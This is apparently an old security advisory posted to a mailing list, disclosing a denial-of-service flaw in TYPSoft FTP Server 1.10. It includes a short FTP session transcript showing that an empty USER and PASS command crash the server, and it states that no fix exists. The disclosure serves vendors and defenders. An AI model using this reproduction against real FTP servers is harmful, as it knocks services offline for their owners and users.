TYPSoft FTP Server 1.10 may be crashed
Application: TYPSoft FTP Server
http://www.typsoft.com
Version: 1.10
Bug: Denial Of Service
Author: intuit
e-mail: intuit@xxxxxxxxxxxxx
web/forum: http://code.unixserver.at
***********************************************************************
1. Description
2. The bug
3. The code
4. The fix
***********************************************************************
^^^^^^^^^^^^^^^^
1. Description:
^^^^^^^^^^^^^^^^
Vendor's Description:
"TYPSoft FTP Server is a fast and easy ftp server with support to
Standard FTP Command, Clean interface, Virtual File System
architecture, ability to resume Download and Upload, IP Restriction,
Login/Quit message, logs, Multi Language and many other things."
***********************************************************************
^^^^^^^^^^^^^^^^
2. The bug:
^^^^^^^^^^^^^^^^
TYPSoft FTP Server may be crashed with empty USERNAME.
***********************************************************************
^^^^^^^^^^^^^^^^
3. The code:
^^^^^^^^^^^^^^^^
To test the vulnerability simply send to the ftp server a empty user name like:
-----------------------------------------------------------------------
220 TYPSoft FTP Server 1.10 ready...
USER
331 Password required for .
PASS
501 Access violation at address 77F526AB in module 'ntdll.dll'.
Write of address 00404C4D
-----------------------------------------------------------------------
and the ftp server may be crashed.
Probably 100% employment of computer resources.
/*Tested on: Win XP Build 2600, Service Pack: None*/
***********************************************************************
^^^^^^^^^^^^^^^^
4. The fix:
^^^^^^^^^^^^^^^^
Not exist.
***********************************************************************
--
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.
Powered by Outblaze